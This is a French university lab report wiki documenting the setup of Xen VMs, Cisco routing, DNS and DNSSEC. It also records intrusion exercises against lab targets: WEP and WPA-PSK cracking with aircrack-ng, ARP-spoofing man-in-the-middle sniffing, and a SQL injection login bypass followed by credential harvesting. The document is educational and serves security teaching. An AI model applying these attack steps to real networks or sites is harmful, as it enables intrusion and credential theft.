 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (16/11/2020)==&lt;br /&gt;
(En collaboration avec le groupe 14)&lt;br /&gt;
&lt;br /&gt;
On connecte physiquement l'ISR au SDSL: Dans le local technique SR52, on repere sur quel port est branché le l'ÍSR pour le mettre dans le VLAN 531&lt;br /&gt;
 conf t&lt;br /&gt;
 int Gi0/37&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 531&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Sur l'ISR:&lt;br /&gt;
* On creer le vlan 531:&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 531&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
Le service SSH était activé par defaut.&lt;br /&gt;
Il faut juste autoriser la connexion en root dans le fichier /etc/ssh/sshd_config&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
puis systemctl restart sshd&lt;br /&gt;
&lt;br /&gt;
et on peut se connecter a notre vm&lt;br /&gt;
 ssh root@193.48.57.188&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La configuration a été réalisé en suivant les instructions dans le sujet de TP rubrique : 4.4  Sécurisation de serveur DNS par DNSSEC&lt;br /&gt;
&lt;br /&gt;
Premièrement nous avons modifié le ficher named.conf.options pour y ajouter l'options suivantes:&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite crée un repertoir trompettedelamort.dnssec afin d'y générer les clefs. Nous devons générer une paire de clef KSK et une paire de clef ZSK.&lt;br /&gt;
&lt;br /&gt;
Pour créer la paire de clef KSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Et pour la paire de clef ZSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Nous renommons ces paires avec comme prefixe trompettedelamort.site et comme suffice -zsk pour la paire zsk et -ksk pour la paire ksk et nous terminon avec .key pour les clefs publiques et .private pour les clefs privées.&lt;br /&gt;
&lt;br /&gt;
Ensuite dans notre fichier zone db.trompettedelamort.site nous ajoutons les lignes suivantes sans oublier d'incrémenter le  Serial:&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-zsk.key&lt;br /&gt;
&lt;br /&gt;
Le fichier db.trompettedelamort.site ressemble donc à cela:&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @ 	IN	SOA	 ns1.trompettedelamort.site.  postmaster.trompettedelamort.site.(&lt;br /&gt;
&lt;br /&gt;
			      8		; Serial&lt;br /&gt;
			 604800		; Refresh&lt;br /&gt;
			  86400		; Retry&lt;br /&gt;
			2419200		; Expire&lt;br /&gt;
			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.trompettedelamort.site.&lt;br /&gt;
 @	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @	IN	MX	100 ns1.trompettedelamort.site.&lt;br /&gt;
 ns1	IN	A       193.48.57.188&lt;br /&gt;
 www	IN	A	193.48.57.188	&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les enregristrement de la zone avec la commande suivante:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
Ce qui a pour effet de générer un fichier zone &amp;quot;db.trompettedelamort.site.signed&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous n'avons donc plus qu'a remplacer db.trompettedelamort.site par db.trompettedelamort.site.signed dans le fichier named.conf.local:&lt;br /&gt;
 root@trompettedelamort:~# cat /etc/bind/named.conf.local   &lt;br /&gt;
 //&lt;br /&gt;
 // Do any local configuration here&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site.signed&amp;quot;;&lt;br /&gt;
	     allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
 // Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
 // organization&lt;br /&gt;
 //include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne reste plus qu'a fournir la clef publique de la clef KSK à gandi.net. Pour se faire il faut se rendre dans &amp;quot;DNSSEC&amp;quot; puis dans &amp;quot;Add an external key&amp;quot;, choisir KSK et &amp;quot;RSA/SHA-1&amp;quot; et renseigner la clef se trouvant dans&lt;br /&gt;
 /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key &lt;br /&gt;
&lt;br /&gt;
On vérifie&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
